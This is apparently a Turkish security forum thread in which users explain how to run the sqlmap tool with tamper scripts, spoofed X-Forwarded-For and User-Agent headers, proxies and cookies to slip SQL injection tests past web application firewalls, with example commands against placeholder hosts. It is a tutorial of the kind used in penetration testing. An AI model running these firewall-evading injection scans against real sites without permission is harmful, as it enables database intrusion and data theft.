sqlmapta hangi tamper scriptlerini kullanmalıyım?
- Konuyu başlatan xr3ktube
- Başlangıç tarihi
değil, sqlmap'de bulunan waff bypasslamak için kullanılan scriptleri verdim hangi waff olduğunu bilmiyorum ama space2comment & mode_security olan kısım yardımcı olabilir örn; swqlmap -u "http://127.1/ambatukam.php?bus=1" --level=5 --risk=3 --random-agent --batch --dbs --tamper=space2comment,between gibisinden
Bu sana yardımcı olur
forum.bugcrowd.com
SQLMap Tamper Scripts (SQL Injection and WAF bypass)
Hey All, You all prob know about SQLmap’s ability to load tamper script rules to evade filters and WAF’s but what I didn’t know until a few months back was that you can use all of them in one line like so: sqlmap -u 'http://www.site.com:80/search.cmd?form_state=1’ --level=5 --risk=3 -p 'item1'...
forum.bugcrowd.com
Merhaba,
Öncelikle WAF türünü keşfetmemiz gerekiyor. Bunun için "--identify-waf" kullanabilirsiniz.
WAF aşmak için timeslep ekleyebilirsiniz. "--time-sec=10"
Random-agent kullanabilirsiniz. "--random-agent"
HTTP Headers değiştirebilirsiniz. "-headers=X-Fowarded-For: IP"
space2comment ile düşük bant yapabilirsiniz. "--tamper='space2comment'"
Birden fazla tamper birleştirerek kullanabilirsiniz. "--tamper="between,space2comment,randomcase,hexencode,charencode,"
Tüm tamper listesini görebilmek için --list-tampers' göz atabilirsiniz.
Öncelikle WAF türünü keşfetmemiz gerekiyor. Bunun için "--identify-waf" kullanabilirsiniz.
WAF aşmak için timeslep ekleyebilirsiniz. "--time-sec=10"
Random-agent kullanabilirsiniz. "--random-agent"
HTTP Headers değiştirebilirsiniz. "-headers=X-Fowarded-For: IP"
space2comment ile düşük bant yapabilirsiniz. "--tamper='space2comment'"
Birden fazla tamper birleştirerek kullanabilirsiniz. "--tamper="between,space2comment,randomcase,hexencode,charencode,"
Tüm tamper listesini görebilmek için --list-tampers' göz atabilirsiniz.
Merhaba,
Vereceğim kaynaklara göz atabilirsiniz. Kaynaklar:
SQL Injection of HTTP headers with sqlmap | OKIOK
OKIOK's expert about penetration testing. When performing penetration testing, sqlmap can be used to have a granular control of the various injection points during a SQL injection.
www.okiok.com
Using Sqlmap with http headers · Issue #646 · sqlmapproject/sqlmap
Hello! I am here with a new issue I am facing. Actually I want to test http headers like host and referer but I don't know how to do this. I already know that sqlmap test user agent when level is h...
github.com
Örnek:
Bash:
sqlmap -u "http://example.com/vuln.php?id=1" --headers="X-Forwarded-For: 127.0.0.1" <--- sahte IP ile
sqlmap -u "http://example.com/vuln.php?id=1" --headers="User-Agent: CustomUserAgent\r\nReferer: https://example.com" <--- site ile
sqlmap -u "http://example.com/vuln.php?id=1" --random-agent <--- rastgele kullanıcı ile
sqlmap -u "http://example.com/vuln.php?id=1" --proxy="http://127.0.0.1:8080" <--- rastgele proxy ile
Cookie ve HTTP
sqlmap -u "http://example.com/vuln.php?id=1" --cookie="PHPSESSID=abcdef12345" --headers="Referer: https://example.com"Gibi özellikleri internette bulabilir ya da --list-tamper'den bakabilirsiniz.
